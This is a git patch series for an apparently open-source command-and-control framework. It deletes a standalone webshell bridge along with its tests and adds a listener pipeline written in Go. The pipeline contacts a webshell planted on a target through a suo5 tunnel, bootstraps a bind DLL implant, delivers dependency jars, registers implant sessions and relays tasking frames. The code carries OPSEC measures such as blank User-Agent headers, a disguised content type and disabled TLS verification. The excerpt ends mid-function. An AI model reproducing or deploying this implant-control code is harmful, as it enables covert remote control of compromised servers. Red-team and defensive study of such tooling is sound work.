ch.DeliverDep(t.Context(), ".jna.jar", fakeJar) - if err != nil { - t.Fatalf("deliver dep: %v", err) - } - if receivedLen != len(fakeJar) { - t.Errorf("expected %d bytes delivered, got %d", len(fakeJar), receivedLen) - } - _ = receivedName -} - -func TestChannelStatusDepsPresent(t *testing.T) { - srv, mock := startMockWebshell(t) - mock.setHandler(func(stage string, body []byte) ([]byte, int) { - if stage == "status" { - return []byte(`{"ready":true,"method":"jna","deps_present":true,"bridge_version":"1.0"}`), 200 - } - return nil, 404 - }) - ch := NewChannel(srv.URL, "") - defer ch.Close() - - if err := ch.Connect(t.Context()); err != nil { - t.Fatalf("connect: %v", err) - } - if ch.lastStatus == nil { - t.Fatal("expected lastStatus") - } - if !ch.lastStatus.DepsPresent { - t.Error("expected deps_present=true") - } - if ch.lastStatus.Method != "jna" { - t.Errorf("expected method 'jna', got %q", ch.lastStatus.Method) - } -} - -// TestHandshakeRejectsSpiteWrapped verifies that the Go bridge rejects the -// old (buggy) wire format where Register was wrapped inside a Spite message. -// This catches the regression where Rust encoded Spite(Register) instead of -// raw Register protobuf. -func TestHandshakeRejectsSpiteWrapped(t *testing.T) { - srv, mock := startMockWebshell(t) - - // Override init handler to return Spite-wrapped Register (the buggy format). - mock.setHandler(func(stage string, body []byte) ([]byte, int) { - if stage == "status" { - return []byte(`{"ready":true,"method":"jni","deps_present":false,"bridge_version":"1.0"}`), 200 - } - if stage == "init" { - reg := &implantpb.Register{ - Name: "test-dll", - Module: []string{"exec"}, - } - // Wrap in a Spite like the buggy Rust code did. - spite := &implantpb.Spite{ - TaskId: 0, - Name: "register", - Body: &implantpb.Spite_Register{Register: reg}, - } - spiteBytes, _ := proto.Marshal(spite) - sid := make([]byte, 4) - binary.LittleEndian.PutUint32(sid, 42) - return append(sid, spiteBytes...), 200 - } - return nil, 404 - }) - - ch := NewChannel(srv.URL, "") - defer ch.Close() - - reg, err := ch.Handshake() - if err == nil && reg.Name == "test-dll" { - t.Fatal("Spite-wrapped Register should NOT parse correctly as raw Register") - } - // Either err != nil or reg.Name != "test-dll" — both indicate the - // Spite-wrapped format is rejected, which is the correct behavior. -} - -// TestHandshakeMultiChunkResponse verifies that if the bridge returns multiple -// response spites (streaming), the Go side can parse them all. -func TestHandshakeMultiChunkResponse(t *testing.T) { - srv, mock := startMockWebshell(t) - - mock.setHandler(func(stage string, body []byte) ([]byte, int) { - if stage == "status" { - return []byte(`{"ready":true,"method":"jni","deps_present":false,"bridge_version":"1.0"}`), 200 - } - if stage == "init" { - regData, _ := proto.Marshal(mock.register) - sid := make([]byte, 4) - binary.LittleEndian.PutUint32(sid, mock.sessionID) - return append(sid, regData...), 200 - } - if stage == "spite" { - // Simulate a module that returns multiple chunks in one response. - outSpites := &implantpb.Spites{ - Spites: []*implantpb.Spite{ - {Name: "chunk-1", TaskId: 10}, - {Name: "chunk-2", TaskId: 10}, - {Name: "chunk-3", TaskId: 10}, - }, - } - data, _ := proto.Marshal(outSpites) - return data, 200 - } - return nil, 404 - }) - - ch := NewChannel(srv.URL, "") - defer ch.Close() - - if _, err := ch.Handshake(); err != nil { - t.Fatalf("handshake: %v", err) - } - - // Open stream, send request, verify all chunks arrive. - respCh := ch.OpenStream(10) - ch.StartRecvLoop() - - received := 0 - timeout := time.After(3 * time.Second) - for received < 3 { - select { - case <-respCh: - received++ - case <-timeout: - t.Fatalf("timeout: got %d/3 chunks", received) - } - } -} - -func TestJitterRange(t *testing.T) { - base := 1 * time.Second - minExpected := time.Duration(float64(base) * (1 - jitterFactor)) - maxExpected := time.Duration(float64(base) * (1 + jitterFactor)) - - for i := 0; i < 100; i++ { - j := jitter(base) - if j < minExpected || j > maxExpected { - t.Fatalf("jitter out of range: got %v, expected [%v, %v]", j, minExpected, maxExpected) - } - } -} - -func TestStreamDispatchViaStreamMode(t *testing.T) { - srv, mock := startMockWebshell(t) - - // Build stream frames: 2 spites for task 200, then connection closes. - var frames [][]byte - for i := 0; i < 2; i++ { - spites := &implantpb.Spites{ - Spites: []*implantpb.Spite{{ - Name: fmt.Sprintf("stream-data-%d", i), - TaskId: 200, - }}, - } - data, _ := proto.Marshal(spites) - frames = append(frames, data) - } - mock.setStreamFrames(frames, 10*time.Millisecond) - - ch := NewChannel(srv.URL, "") - defer ch.Close() - - if err := ch.Connect(t.Context()); err != nil { - t.Fatalf("connect: %v", err) - } - - respCh := ch.OpenStream(200) - ch.StartRecvLoop() - - for i := 0; i < 2; i++ { - select { - case spite := <-respCh: - expected := fmt.Sprintf("stream-data-%d", i) - if spite.Name != expected { - t.Errorf("frame %d: expected %q, got %q", i, expected, spite.Name) - } - case <-time.After(3 * time.Second): - t.Fatalf("timeout waiting for stream frame %d", i) - } - } - ch.CloseStream(200) -} - -func TestStreamFallbackToPoll(t *testing.T) { - srv, mock := startMockWebshell(t) - - // Stream returns 404 (not supported) — should fall back to poll mode. - // Leave streamFrames nil so handleStream returns 404. - - var callCount int - var mu sync.Mutex - mock.setHandler(func(stage string, body []byte) ([]byte, int) { - switch stage { - case "status": - return []byte(`{"ready":true,"method":"jni","deps_present":false,"bridge_version":"1.0"}`), 200 - case "init": - regData, _ := proto.Marshal(mock.register) - sid := make([]byte, 4) - binary.LittleEndian.PutUint32(sid, mock.sessionID) - return append(sid, regData...), 200 - case "stream": - return nil, 404 - case "spite": - mu.Lock() - callCount++ - n := callCount - mu.Unlock() - if n <= 2 { - resp := &implantpb.Spites{ - Spites: []*implantpb.Spite{{ - Name: "poll-data", - TaskId: 300, - }}, - } - data, _ := proto.Marshal(resp) - return data, 200 - } - empty, _ := proto.Marshal(&implantpb.Spites{}) - return empty, 200 - } - return nil, 404 - }) - - ch := NewChannel(srv.URL, "") - defer ch.Close() - - if err := ch.Connect(t.Context()); err != nil { - t.Fatalf("connect: %v", err) - } - - respCh := ch.OpenStream(300) - ch.StartRecvLoop() - - select { - case spite := <-respCh: - if spite.Name != "poll-data" { - t.Errorf("expected 'poll-data', got %q", spite.Name) - } - case <-time.After(5 * time.Second): - t.Fatal("timeout waiting for poll fallback data") - } - ch.CloseStream(300) -} - -func TestStreamHeartbeatFrame(t *testing.T) { - srv, mock := startMockWebshell(t) - - // Send: heartbeat (0-len frame), real data, heartbeat. - spites := &implantpb.Spites{ - Spites: []*implantpb.Spite{{Name: "after-heartbeat", TaskId: 400}}, - } - data, _ := proto.Marshal(spites) - mock.setStreamFrames([][]byte{ - {}, // zero-length heartbeat - data, // real frame - {}, // another heartbeat - }, 10*time.Millisecond) - - ch := NewChannel(srv.URL, "") - defer ch.Close() - - if err := ch.Connect(t.Context()); err != nil { - t.Fatalf("connect: %v", err) - } - - respCh := ch.OpenStream(400) - ch.StartRecvLoop() - - select { - case spite := <-respCh: - if spite.Name != "after-heartbeat" { - t.Errorf("expected 'after-heartbeat', got %q", spite.Name) - } - case <-time.After(3 * time.Second): - t.Fatal("timeout waiting for data after heartbeat") - } - ch.CloseStream(400) -} - -func TestReadFrameOversized(t *testing.T) { - // Frame length exceeding streamFrameMaxSize should error. - lenBuf := make([]byte, 4) - binary.BigEndian.PutUint32(lenBuf, streamFrameMaxSize+1) - r := bytes.NewReader(lenBuf) - _, err := readFrame(r) - if err == nil { - t.Fatal("expected error for oversized frame") - } -} diff --git a/server/cmd/webshell-bridge/config.go b/server/cmd/webshell-bridge/config.go deleted file mode 100644 index 75e251c9..00000000 --- a/server/cmd/webshell-bridge/config.go +++ /dev/null @@ -1,20 +0,0 @@ -package main - -// Config holds the bridge configuration. -type Config struct { - AuthFile string // path to listener.auth mTLS certificate - ServerAddr string // optional server address override - ListenerName string // listener name for registration - ListenerIP string // listener external IP - PipelineName string // pipeline name - WebshellURL string // webshell URL (http:// or https://) - StageToken string // auth token for X-Stage requests (must match webshell's STAGE_TOKEN) - DLLPath string // optional path to bridge DLL for auto-loading - DepsDir string // optional dir containing dependency jars (e.g., jna.jar) for auto-delivery - Debug bool // enable debug logging -} - -// WebshellHTTPURL returns the webshell URL for HTTP requests. -func (c *Config) WebshellHTTPURL() string { - return c.WebshellURL -} diff --git a/server/cmd/webshell-bridge/main.go b/server/cmd/webshell-bridge/main.go deleted file mode 100644 index a3ed4bd7..00000000 --- a/server/cmd/webshell-bridge/main.go +++ /dev/null @@ -1,63 +0,0 @@ -package main - -import ( - "context" - "flag" - "fmt" - "os" - "os/signal" - "syscall" - - "github.com/chainreactors/logs" -) - -func main() { - cfg := &Config{} - flag.StringVar(&cfg.AuthFile, "auth", "", "path to listener.auth mTLS certificate file") - flag.StringVar(&cfg.ServerAddr, "server", "", "server address (overrides auth file)") - flag.StringVar(&cfg.ListenerName, "listener", "webshell-listener", "listener name") - flag.StringVar(&cfg.ListenerIP, "ip", "127.0.0.1", "listener external IP") - flag.StringVar(&cfg.PipelineName, "pipeline", "", "pipeline name (auto-generated if empty)") - flag.StringVar(&cfg.WebshellURL, "url", "", "webshell URL (e.g. http://target/shell.jsp)") - flag.StringVar(&cfg.StageToken, "token", "", "auth token matching webshell's STAGE_TOKEN") - flag.StringVar(&cfg.DLLPath, "dll", "", "path to bridge DLL for auto-loading (optional)") - flag.StringVar(&cfg.DepsDir, "deps", "", "dir containing dependency jars (e.g., jna.jar) for auto-delivery") - flag.BoolVar(&cfg.Debug, "debug", false, "enable debug logging") - flag.Parse() - - if cfg.AuthFile == "" || cfg.WebshellURL == "" { - fmt.Fprintf(os.Stderr, "Usage: webshell-bridge --auth --url --token \n") - flag.PrintDefaults() - os.Exit(1) - } - - if cfg.PipelineName == "" { - cfg.PipelineName = fmt.Sprintf("webshell_%s", cfg.ListenerName) - } - - if cfg.Debug { - logs.Log.SetLevel(logs.DebugLevel) - } - - ctx, cancel := context.WithCancel(context.Background()) - defer cancel() - - sigCh := make(chan os.Signal, 1) - signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM) - go func() { - <-sigCh - logs.Log.Important("shutting down...") - cancel() - }() - - bridge, err := NewBridge(cfg) - if err != nil { - logs.Log.Errorf("failed to create bridge: %v", err) - os.Exit(1) - } - - if err := bridge.Start(ctx); err != nil { - logs.Log.Errorf("bridge exited with error: %v", err) - os.Exit(1) - } -} diff --git a/server/cmd/webshell-bridge/main_test.go b/server/cmd/webshell-bridge/main_test.go deleted file mode 100644 index 83667a42..00000000 --- a/server/cmd/webshell-bridge/main_test.go +++ /dev/null @@ -1,15 +0,0 @@ -package main - -import ( - "io" - "os" - "testing" - - "github.com/chainreactors/logs" -) - -func TestMain(m *testing.M) { - logs.Log = logs.NewLogger(logs.WarnLevel) - logs.Log.SetOutput(io.Discard) - os.Exit(m.Run()) -} diff --git a/server/cmd/webshell-bridge/pipelinectl/main.go b/server/cmd/webshell-bridge/pipelinectl/main.go deleted file mode 100644 index f40cca95..00000000 --- a/server/cmd/webshell-bridge/pipelinectl/main.go +++ /dev/null @@ -1,98 +0,0 @@ -package main - -import ( - "context" - "flag" - "fmt" - "log" - - "github.com/chainreactors/IoM-go/client" - "github.com/chainreactors/IoM-go/mtls" - "github.com/chainreactors/IoM-go/proto/client/clientpb" -) - -func main() { - authFile := flag.String("auth", "", "path to admin.auth file") - action := flag.String("action", "start", "action: list, register, start, stop") - listenerID := flag.String("listener", "webshell-listener", "listener ID") - pipelineName := flag.String("pipeline", "webshell_webshell-listener", "pipeline name") - pipelineType := flag.String("type", "webshell", "pipeline type") - flag.Parse() - - if *authFile == "" { - log.Fatal("--auth is required") - } - - config, err := mtls.ReadConfig(*authFile) - if err != nil { - log.Fatalf("read config: %v", err) - } - - conn, err := mtls.Connect(config) - if err != nil { - log.Fatalf("connect: %v", err) - } - defer conn.Close() - - server, err := client.NewServerStatus(conn, config) - if err != nil { - log.Fatalf("init server: %v", err) - } - - switch *action { - case "list": - listeners, err := server.Rpc.GetListeners(context.Background(), &clientpb.Empty{}) - if err != nil { - log.Fatalf("get listeners: %v", err) - } - for _, l := range listeners.Listeners { - fmt.Printf("Listener: %s IP: %s Active: %v\n", l.Id, l.Ip, l.Active) - if l.Pipelines != nil { - for _, p := range l.Pipelines.Pipelines { - fmt.Printf(" Pipeline: %s Enable: %v\n", p.Name, p.Enable) - } - } - } - - case "register": - fmt.Printf("Registering pipeline %s (type=%s) on listener %s\n", *pipelineName, *pipelineType, *listenerID) - _, err := server.Rpc.RegisterPipeline(context.Background(), &clientpb.Pipeline{ - Name: *pipelineName, - ListenerId: *listenerID, - Type: *pipelineType, - Enable: true, - Body: &clientpb.Pipeline_Tcp{ - Tcp: &clientpb.TCPPipeline{ - Host: "127.0.0.1", - Port: 0, - }, - }, - }) - if err != nil { - log.Fatalf("register pipeline: %v", err) - } - fmt.Println("Pipeline registered!") - - case "start": - fmt.Printf("Starting pipeline %s on listener %s\n", *pipelineName, *listenerID) - _, err := server.Rpc.StartPipeline(context.Background(), &clientpb.CtrlPipeline{ - Name: *pipelineName, - ListenerId: *listenerID, - }) - if err != nil { - log.Fatalf("start pipeline: %v", err) - } - fmt.Println("Pipeline started!") - - case "stop": - fmt.Printf("Stopping pipeline %s on listener %s\n", *pipelineName, *listenerID) - _, err := server.Rpc.StopPipeline(context.Background(), &clientpb.CtrlPipeline{ - Name: *pipelineName, - ListenerId: *listenerID, - }) - if err != nil { - log.Fatalf("stop pipeline: %v", err) - } - fmt.Println("Pipeline stopped!") - } -} diff --git a/server/cmd/webshell-bridge/session.go b/server/cmd/webshell-bridge/session.go deleted file mode 100644 index aa4f183f..00000000 --- a/server/cmd/webshell-bridge/session.go +++ /dev/null @@ -1,116 +0,0 @@ -package main - -import ( - "context" - "fmt" - "time" - - "github.com/chainreactors/IoM-go/proto/client/clientpb" - "github.com/chainreactors/IoM-go/proto/implant/implantpb" - "github.com/chainreactors/IoM-go/proto/services/listenerrpc" - "github.com/chainreactors/logs" -) - -// Session represents a single implant session managed by the bridge. -// Each session owns a Channel that communicates with the malefic bind DLL -// on the target through the malefic protocol over HTTP. -type Session struct { - ID string - PipelineID string - ListenerID string - - channel ChannelIface -} - -// NewSession reads the malefic handshake from the DLL (SysInfo + Modules) -// and registers the session with the server. -func NewSession( - rpc listenerrpc.ListenerRPCClient, - ctx context.Context, - id, pipelineID, listenerID string, - channel ChannelIface, -) (*Session, error) { - // Read registration data from DLL via malefic handshake - reg, err := channel.Handshake() - if err != nil { - return nil, fmt.Errorf("handshake: %w", err) - } - - sess := &Session{ - ID: id, - PipelineID: pipelineID, - ListenerID: listenerID, - channel: channel, - } - - // Use real data from the DLL - if reg.Name == "" { - reg.Name = fmt.Sprintf("webshell-%s", id[:8]) - } - - _, err = rpc.Register(ctx, &clientpb.RegisterSession{ - SessionId: id, - PipelineId: pipelineID, - ListenerId: listenerID, - RawId: channel.SessionID(), - RegisterData: reg, - Target: fmt.Sprintf("webshell://%s", id), - }) - if err != nil { - return nil, fmt.Errorf("register session: %w", err) - } - - logs.Log.Importantf("session registered: %s (name=%s, modules=%d, sid=%d)", id, reg.Name, len(reg.Module), channel.SessionID()) - return sess, nil -} - -// HandleUnary forwards a Spite request through the malefic channel to the -// bind DLL and returns a single response. Use for non-streaming tasks. -func (s *Session) HandleUnary(taskID uint32, req *implantpb.Spite) (*implantpb.Spite, error) { - return s.channel.Forward(taskID, req) -} - -// OpenTaskStream registers a persistent response channel for a streaming task. -// Returns a channel that receives all DLL responses for this taskID. -func (s *Session) OpenTaskStream(taskID uint32) <-chan *implantpb.Spite { - return s.channel.OpenStream(taskID) -} - -// SendTaskSpite sends a spite to the DLL for a task (streaming or initial request). -func (s *Session) SendTaskSpite(taskID uint32, spite *implantpb.Spite) error { - return s.channel.SendSpite(taskID, spite) -} - -// CloseTaskStream cleans up a streaming task's response channel. -func (s *Session) CloseTaskStream(taskID uint32) { - s.channel.CloseStream(taskID) -} - -// Checkin sends a heartbeat for this session. -func (s *Session) Checkin(rpc listenerrpc.ListenerRPCClient, ctx context.Context) { - _, err := rpc.Checkin(ctx, &implantpb.Ping{ - Nonce: int32(time.Now().Unix() & 0x7FFFFFFF), - }) - if err != nil { - logs.Log.Debugf("checkin failed for %s: %v", s.ID, err) - } -} - -// Close shuts down the session's malefic channel. -// The server will mark the session dead when checkins stop. -func (s *Session) Close() error { - logs.Log.Importantf("session %s closing (server will mark dead after checkin timeout)", s.ID) - if s.channel != nil { - s.channel.CloseAllStreams() - return s.channel.Close() - } - return nil -} - -// Alive returns true if the underlying malefic channel is still connected. -func (s *Session) Alive() bool { - if s.channel == nil { - return false - } - return !s.channel.IsClosed() -} From 86b5d5816d7aef1b8d29d87f949b7bdfd3854efd Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Mon, 23 Mar 2026 04:15:45 +0800 Subject: [PATCH 14/19] chore(deps): update IoM-go submodule and move suo5 to indirect --- external/IoM-go | 2 +- go.mod | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/external/IoM-go b/external/IoM-go index 878f45b4..1181f64a 160000 --- a/external/IoM-go +++ b/external/IoM-go @@ -1 +1 @@ -Subproject commit 878f45b4d1cb34ea132a9eafea3ae79caf3b07f0 +Subproject commit 1181f64a77d24693fc6820ddefc908a35babedfd diff --git a/go.mod b/go.mod index 74060951..91ce5cc0 100644 --- a/go.mod +++ b/go.mod @@ -47,7 +47,6 @@ require ( github.com/traefik/yaegi v0.14.3 github.com/wabzsy/gonut v1.0.0 github.com/yuin/gopher-lua v1.1.1 - github.com/zema1/suo5 v1.3.2-0.20250219115440-31983ee59a83 gopkg.in/yaml.v3 v3.0.1 gorm.io/driver/postgres v1.6.0 gorm.io/gorm v1.25.10 @@ -213,6 +212,7 @@ require ( github.com/yuin/goldmark v1.7.4 // indirect github.com/yuin/goldmark-emoji v1.0.3 // indirect github.com/zema1/rawhttp v0.2.0 // indirect + github.com/zema1/suo5 v1.3.2-0.20250219115440-31983ee59a83 // indirect golang.org/x/mod v0.32.0 // indirect golang.org/x/tools v0.41.0 // indirect golang.org/x/xerrors v0.0.0-20231012003039-104605ab7028 // indirect From f12afe5bd62bc275f5a656a42f69146da544cccc Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Mon, 23 Mar 2026 04:15:54 +0800 Subject: [PATCH 15/19] feat(pipeline): preserve raw custom params through DB roundtrips Add RawCustomParams field to PipelineParams so that non-built-in pipeline types (e.g. webshell) retain their original JSON params when serialized to/from the database. --- helper/implanttypes/pipeline.go | 3 +++ server/internal/db/models/pipeline.go | 9 ++++++++- 2 files changed, 11 insertions(+), 1 deletion(-) diff --git a/helper/implanttypes/pipeline.go b/helper/implanttypes/pipeline.go index 67ddd643..873459ce 100644 --- a/helper/implanttypes/pipeline.go +++ b/helper/implanttypes/pipeline.go @@ -235,6 +235,9 @@ type PipelineParams struct { ErrorPage string `json:"error_page,omitempty" gorm:"-"` BodyPrefix string `json:"body_prefix,omitempty"` BodySuffix string `json:"body_suffix,omitempty"` + // RawCustomParams preserves the original Custom.Params JSON string for + // non-built-in pipeline types (e.g. webshell), surviving DB roundtrips. + RawCustomParams string `json:"raw_custom_params,omitempty"` } func (params *PipelineParams) String() string { diff --git a/server/internal/db/models/pipeline.go b/server/internal/db/models/pipeline.go index b405e1bb..f95f45bd 100644 --- a/server/internal/db/models/pipeline.go +++ b/server/internal/db/models/pipeline.go @@ -55,12 +55,15 @@ func customPipelineParams(params string, pipeline *clientpb.Pipeline) *implantty merged := pipelineParamsFromProto(pipeline) customParams, err := implanttypes.UnmarshalPipelineParams(params) if err != nil || customParams == nil { + merged.RawCustomParams = params return merged } customParams.Parser = merged.Parser customParams.Tls = merged.Tls customParams.Encryption = merged.Encryption customParams.Secure = merged.Secure + // Preserve original custom params JSON for non-built-in pipelines (e.g. webshell) + customParams.RawCustomParams = params return customParams } @@ -191,8 +194,12 @@ func (pipeline *Pipeline) ToProtobuf() *clientpb.Pipeline { } default: // All non-built-in types (custom/externally-managed pipelines). + // Prefer the preserved raw custom params over re-marshaling PipelineParams, + // because PipelineParams may not have fields for custom keys (e.g. suo5_url). params := "" - if pipeline.PipelineParams != nil { + if pipeline.PipelineParams != nil && pipeline.PipelineParams.RawCustomParams != "" { + params = pipeline.PipelineParams.RawCustomParams + } else if pipeline.PipelineParams != nil { data, _ := json.Marshal(pipeline.PipelineParams) params = string(data) } From a8a4ae48812f6e7527d59f23b0cf197fdfebb2cc Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Mon, 23 Mar 2026 04:16:02 +0800 Subject: [PATCH 16/19] feat(listener): add WebShellPipeline with suo5 transport Implement WebShellPipeline inside the listener process, replacing the standalone bridge binary. Uses suo5 for full-duplex streaming, supports DLL bootstrap via HTTP staging, TLV framing, and dependency delivery. --- server/listener/listener.go | 6 +- server/listener/webshell.go | 492 +++++++++++++++++++++++++++++++ server/listener/webshell_test.go | 201 +++++++++++++ 3 files changed, 698 insertions(+), 1 deletion(-) create mode 100644 server/listener/webshell.go create mode 100644 server/listener/webshell_test.go diff --git a/server/listener/listener.go b/server/listener/listener.go index 7ae30f25..090e87ee 100644 --- a/server/listener/listener.go +++ b/server/listener/listener.go @@ -500,7 +500,11 @@ func (lns *listener) startPipeline(pipelinepb *clientpb.Pipeline) (core.Pipeline case *clientpb.Pipeline_Http: p, err = NewHttpPipeline(lns.Rpc, pipelinepb) case *clientpb.Pipeline_Custom: - p = NewCustomPipeline(pipelinepb) + if pipelinepb.Type == "webshell" { + p, err = NewWebShellPipeline(lns.Rpc, pipelinepb) + } else { + p = NewCustomPipeline(pipelinepb) + } default: // Fallback: treat any unknown body as custom pipeline. p = NewCustomPipeline(pipelinepb) diff --git a/server/listener/webshell.go b/server/listener/webshell.go new file mode 100644 index 00000000..aecf41a1 --- /dev/null +++ b/server/listener/webshell.go @@ -0,0 +1,492 @@ +package listener + +import ( + "bytes" + "crypto/hmac" + "crypto/sha256" + "crypto/tls" + "encoding/binary" + "encoding/hex" + "encoding/json" + "fmt" + "io" + "net" + "net/http" + "net/url" + "os" + "path/filepath" + "strings" + "sync" + "time" + + "github.com/chainreactors/IoM-go/consts" + "github.com/chainreactors/IoM-go/proto/client/clientpb" + "github.com/chainreactors/IoM-go/proto/implant/implantpb" + "github.com/chainreactors/IoM-go/types" + "github.com/chainreactors/logs" + "github.com/chainreactors/malice-network/helper/encoders/hash" + "github.com/chainreactors/malice-network/server/internal/core" + "github.com/chainreactors/proxyclient/suo5" + "google.golang.org/protobuf/proto" +) + +// Stage codes for DLL bootstrap HTTP envelope. +const ( + wsStageLoad byte = 0x01 + wsStageStatus byte = 0x02 + wsStageInit byte = 0x03 + wsStageDeps byte = 0x06 +) + +// TLV delimiters matching malefic wire format. +const ( + tlvStart byte = 0xd1 + tlvEnd byte = 0xd2 + tlvHeaderLen = 9 // 1 (start) + 4 (sid) + 4 (len) + maxFrameSize uint32 = 10 * 1024 * 1024 +) + +// webshellParams is the JSON stored in CustomPipeline.Params. +type webshellParams struct { + Suo5URL string `json:"suo5_url"` + StageToken string `json:"stage_token,omitempty"` + DLLPath string `json:"dll_path,omitempty"` + DepsDir string `json:"deps_dir,omitempty"` +} + +// httpTransport wraps a shared http.Client with OPSEC-safe defaults. +type httpTransport struct { + client *http.Client + url string + token string +} + +func newHTTPTransport(suo5URL, token string, timeout time.Duration) *httpTransport { + return &httpTransport{ + client: &http.Client{ + Timeout: timeout, + Transport: &http.Transport{ + TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, + }, + }, + url: suo5ToHTTPURL(suo5URL), + token: token, + } +} + +// do sends a body-envelope HTTP POST. +// Envelope: [1B stage][4B sid LE][1B token_len][token][payload] +// No XOR obfuscation — webshells (PHP/JSP/ASPX) parse the raw envelope directly. +func (t *httpTransport) do(stage byte, payload []byte, sid uint32) ([]byte, error) { + tok := computeBootstrapToken(t.token) + tokLen := len(tok) + if tokLen > 255 { + tokLen = 255 + tok = tok[:255] + } + + hdrLen := 6 + tokLen + buf := make([]byte, hdrLen+len(payload)) + buf[0] = stage + binary.LittleEndian.PutUint32(buf[1:5], sid) + buf[5] = byte(tokLen) + copy(buf[6:6+tokLen], tok) + copy(buf[hdrLen:], payload) + + req, err := http.NewRequest("POST", t.url, bytes.NewReader(buf)) + if err != nil { + return nil, err + } + // OPSEC: no fingerprinting headers. + req.Header.Set("User-Agent", "") + req.Header.Set("Content-Type", "application/x-www-form-urlencoded") + + resp, err := t.client.Do(req) + if err != nil { + return nil, err + } + defer resp.Body.Close() + + body, err := io.ReadAll(resp.Body) + if err != nil { + return nil, err + } + if resp.StatusCode != http.StatusOK { + return nil, fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(body)) + } + return body, nil +} + +func NewWebShellPipeline(rpc bindRPCClient, pipeline *clientpb.Pipeline) (*WebShellPipeline, error) { + custom := pipeline.GetCustom() + if custom == nil { + return nil, fmt.Errorf("webshell pipeline missing custom body") + } + + var params webshellParams + if custom.Params != "" { + if err := json.Unmarshal([]byte(custom.Params), ¶ms); err != nil { + return nil, fmt.Errorf("parse webshell params: %w", err) + } + } + if params.Suo5URL == "" && custom.Host != "" { + params.Suo5URL = custom.Host + } + if params.Suo5URL == "" { + return nil, fmt.Errorf("webshell pipeline requires suo5_url") + } + + return &WebShellPipeline{ + rpc: rpc, + Name: pipeline.Name, + ListenerID: pipeline.ListenerId, + Enable: pipeline.Enable, + Suo5URL: params.Suo5URL, + StageToken: params.StageToken, + DLLPath: params.DLLPath, + DepsDir: params.DepsDir, + transport: newHTTPTransport(params.Suo5URL, params.StageToken, 30*time.Second), + pipeline: pipeline, + }, nil +} + +type WebShellPipeline struct { + rpc bindRPCClient + Name string + ListenerID string + Enable bool + Suo5URL string + StageToken string + DLLPath string + DepsDir string + + transport *httpTransport + sessions sync.Map // rawID(uint32) → *webshellSession + pipeline *clientpb.Pipeline +} + +type webshellSession struct { + conn net.Conn + rawID uint32 + mu sync.Mutex +} + +func (p *WebShellPipeline) ID() string { return p.Name } + +func (p *WebShellPipeline) ToProtobuf() *clientpb.Pipeline { return p.pipeline } + +func (p *WebShellPipeline) Start() error { + p.Enable = true + forward, err := core.NewForward(p.rpc, p) + if err != nil { + return err + } + forward.ListenerId = p.ListenerID + core.Forwarders.Add(forward) + + logs.Log.Infof("[pipeline] starting WebShell pipeline %s -> %s", p.Name, p.Suo5URL) + core.GoGuarded("webshell-handler:"+p.Name, p.handler, p.runtimeErrorHandler("handler loop")) + return nil +} + +func (p *WebShellPipeline) Close() error { + p.Enable = false + p.sessions.Range(func(key, value interface{}) bool { + sess := value.(*webshellSession) + sess.conn.Close() + p.sessions.Delete(key) + return true + }) + return nil +} + +// handler is the main loop receiving SpiteRequests from the server via Forward. +func (p *WebShellPipeline) handler() error { + defer logs.Log.Debugf("webshell pipeline %s handler exit", p.Name) + for { + forward := core.Forwarders.Get(p.ID()) + if forward == nil { + return fmt.Errorf("webshell pipeline %s forwarder missing", p.Name) + } + msg, err := forward.Stream.Recv() + if err != nil { + return fmt.Errorf("webshell pipeline %s recv: %w", p.Name, err) + } + core.GoGuarded("webshell-request:"+p.Name, func() error { + return p.handlerReq(msg) + }, core.LogGuardedError("webshell-request:"+p.Name)) + } +} + +// handlerReq dispatches a single SpiteRequest. ModuleInit triggers DLL bootstrap +// and suo5 channel setup; everything else is forwarded to the session conn. +func (p *WebShellPipeline) handlerReq(req *clientpb.SpiteRequest) error { + rawID := req.Session.RawId + + if req.Spite.Name == consts.ModuleInit { + return p.initSession(rawID) + } + + val, ok := p.sessions.Load(rawID) + if !ok { + return fmt.Errorf("session %d not found", rawID) + } + sess := val.(*webshellSession) + + spites := &implantpb.Spites{Spites: []*implantpb.Spite{req.Spite}} + sess.mu.Lock() + err := writeFrame(sess.conn, spites, sess.rawID) + sess.mu.Unlock() + return err +} + +// initSession bootstraps DLL, dials suo5, registers session, starts readLoop. +func (p *WebShellPipeline) initSession(rawID uint32) error { + if p.DepsDir != "" { + if err := p.deliverDeps(); err != nil { + logs.Log.Warnf("deliver deps: %v", err) + } + } + + reg, sid, err := p.bootstrapDLL() + if err != nil { + return fmt.Errorf("bootstrap DLL: %w", err) + } + + conn, err := p.dialSuo5() + if err != nil { + return fmt.Errorf("dial suo5: %w", err) + } + + sess := &webshellSession{conn: conn, rawID: sid} + p.sessions.Store(sid, sess) + + regSpite, _ := types.BuildSpite(&implantpb.Spite{ + Name: types.MsgRegister.String(), + }, reg) + + sessionID := hash.Md5Hash([]byte(fmt.Sprintf("%d", sid))) + core.Forwarders.Send(p.ID(), &core.Message{ + Spites: &implantpb.Spites{Spites: []*implantpb.Spite{regSpite}}, + SessionID: sessionID, + RawID: sid, + }) + + core.GoGuarded( + fmt.Sprintf("webshell-readloop:%s:%d", p.Name, sid), + func() error { return p.readLoop(sess, sessionID) }, + core.LogGuardedError(fmt.Sprintf("webshell-readloop:%s:%d", p.Name, sid)), + ) + + logs.Log.Importantf("[webshell] session %d registered via %s", sid, p.Suo5URL) + return nil +} + +// readLoop reads TLV frames from suo5 conn and forwards to server. +func (p *WebShellPipeline) readLoop(sess *webshellSession, sessionID string) error { + defer func() { + sess.conn.Close() + p.sessions.Delete(sess.rawID) + logs.Log.Debugf("[webshell] readLoop exit for session %d", sess.rawID) + }() + for { + spites, err := readFrame(sess.conn) + if err != nil { + return fmt.Errorf("session %d read: %w", sess.rawID, err) + } + core.Forwarders.Send(p.ID(), &core.Message{ + Spites: spites, + SessionID: sessionID, + RawID: sess.rawID, + }) + } +} + +// bootstrapDLL performs status check, DLL load if needed, and init handshake. +func (p *WebShellPipeline) bootstrapDLL() (*implantpb.Register, uint32, error) { + statusBody, err := p.transport.do(wsStageStatus, nil, 0) + if err != nil { + return nil, 0, fmt.Errorf("status check: %w", err) + } + + ready := false + text := strings.TrimSpace(string(statusBody)) + if len(text) > 0 && text[0] == '{' { + var sr struct{ Ready 